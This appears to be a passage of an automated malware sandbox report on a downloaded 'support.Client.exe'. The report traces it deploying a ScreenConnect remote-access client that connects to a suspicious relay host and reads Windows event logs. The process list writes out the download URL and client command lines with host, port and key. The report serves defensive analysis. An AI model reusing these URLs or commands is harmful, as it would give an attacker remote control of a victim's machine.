              Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
              Source: svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1366965576.0000024F94624000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
              Source: ScreenConnect.Core.dll.14.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
              Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
              Source: svchost.exe, 00000004.00000003.1202956022.00000227BD062000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
              Source: svchost.exe, 00000007.00000003.1366577768.0000024F94630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak
              Source: svchost.exe, 00000007.00000003.1366577768.0000024F94630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virt
              Source: svchost.exe, 00000007.00000003.1366577768.0000024F94630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtuX
              Source: svchost.exe, 00000007.00000003.1366547425.0000024F94641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
              Source: svchost.exe, 00000007.00000003.1366532997.0000024F94649000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
              Source: svchost.exe, 00000007.00000003.1366577768.0000024F94630000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366532997.0000024F94649000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1367091647.0000024F94659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
              Source: svchost.exe, 00000007.00000002.1366965576.0000024F94624000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
              Source: svchost.exe, 00000007.00000003.1366577768.0000024F94630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.x
              Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
              Source: svchost.exe, 00000007.00000002.1367091647.0000024F94659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
              Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49726 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.4.254:443 -> 192.168.2.16:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.219.254:443 -> 192.168.2.16:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49743 version: TLS 1.2
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4Jump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42BJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to dropped file

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Reads the Security eventlog
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
              Reads the System eventlog
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\user.config
              Source: bfb7a509-8b20-4376-b9ba-bfeeb014e662.tmp.0.drStatic PE information: No import functions for PE file found
              Source: bfb7a509-8b20-4376-b9ba-bfeeb014e662.tmp.0.drStatic PE information: Data appended to the last section found
              Source: ScreenConnect.WindowsBackstageShell.exe.14.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
              Source: ScreenConnect.WindowsBackstageShell.exe.14.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
              Source: ScreenConnect.WindowsBackstageShell.exe.14.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
              Source: ScreenConnect.WindowsBackstageShell.exe0.14.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
              Source: ScreenConnect.WindowsBackstageShell.exe0.14.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
              Source: ScreenConnect.WindowsBackstageShell.exe0.14.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
              Source: classification engineClassification label: mal68.evad.win@46/81@7/5
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8136:120:WilError_03
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeMutant created: NULL
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\DeploymentJump to behavior
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\svchost.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITSJump to behavior
              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r="
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5668 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
              Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3360 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Users\user\Downloads\support.Client.exe "C:\Users\user\Downloads\support.Client.exe"
              Source: C:\Users\user\Downloads\support.Client.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe"
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session" "1"
              Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session" "1"
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe" "RunRole" "286148cd-317c-42bd-b1b6-847f55f60348" "User"
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe" "RunRole" "dab60135-edfb-4837-8e58-b67bfb3544e3" "System"
              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5668 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3360 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Users\user\Downloads\support.Client.exe "C:\Users\user\Downloads\support.Client.exe" Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe" Jump to behavior
